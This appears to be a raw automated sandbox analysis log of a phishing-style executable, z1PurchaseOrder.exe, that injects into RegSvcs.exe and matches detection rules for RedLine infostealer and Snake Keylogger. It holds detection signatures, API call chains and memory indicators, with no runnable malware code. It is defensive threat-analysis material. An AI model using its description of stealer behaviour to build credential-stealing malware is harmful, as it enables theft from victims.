            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00418CCC1_2_00418CCC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00406CA01_2_00406CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004028B01_2_004028B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041A4BE1_2_0041A4BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408C601_2_00408C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004182441_2_00418244
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004016501_2_00401650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402F201_2_00402F20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004193C41_2_004193C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004187881_2_00418788
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402F891_2_00402F89
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402B901_2_00402B90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004073A01_2_004073A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02FF12C01_2_02FF12C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02FF12B31_2_02FF12B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02FF15601_2_02FF1560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02FF154F1_2_02FF154F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593B4D01_2_0593B4D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593B7B01_2_0593B7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593F7681_2_0593F768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593A6101_2_0593A610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593B1F01_2_0593B1F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593AC301_2_0593AC30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593AF101_2_0593AF10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593CED01_2_0593CED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05934E701_2_05934E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593A9501_2_0593A950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_059389581_2_05938958
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_059338381_2_05933838
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593EB181_2_0593EB18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593B4BF1_2_0593B4BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593B7A11_2_0593B7A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593F7591_2_0593F759
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_059326B11_2_059326B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593A6601_2_0593A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593B1E01_2_0593B1E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593E0191_2_0593E019
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593E0281_2_0593E028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593AC1F1_2_0593AC1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593AF001_2_0593AF00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593CEC01_2_0593CEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593A9401_2_0593A940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_059338281_2_05933828
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0593EB081_2_0593EB08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: String function: 0041718C appears 44 times
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: String function: 0040E6D0 appears 35 times
            Source: z1PurchaseOrder.exe, 00000000.00000003.1692968979.0000000004733000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1PurchaseOrder.exe
            Source: z1PurchaseOrder.exe, 00000000.00000003.1693630729.00000000048DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1PurchaseOrder.exe
            Source: z1PurchaseOrder.exe, 00000000.00000002.1696353856.0000000000B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs z1PurchaseOrder.exe
            Source: z1PurchaseOrder.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.z1PurchaseOrder.exe.b20000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000000.00000002.1696353856.0000000000B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000001.00000002.4133626873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: RegSvcs.exe PID: 7456, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@5/4
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeFile created: C:\Users\user\AppData\Local\Temp\niellistsJump to behavior
            Source: z1PurchaseOrder.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: z1PurchaseOrder.exeReversingLabs: Detection: 50%
            Source: z1PurchaseOrder.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeFile read: C:\Users\user\Desktop\z1PurchaseOrder.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\z1PurchaseOrder.exe "C:\Users\user\Desktop\z1PurchaseOrder.exe"
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z1PurchaseOrder.exe"
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z1PurchaseOrder.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
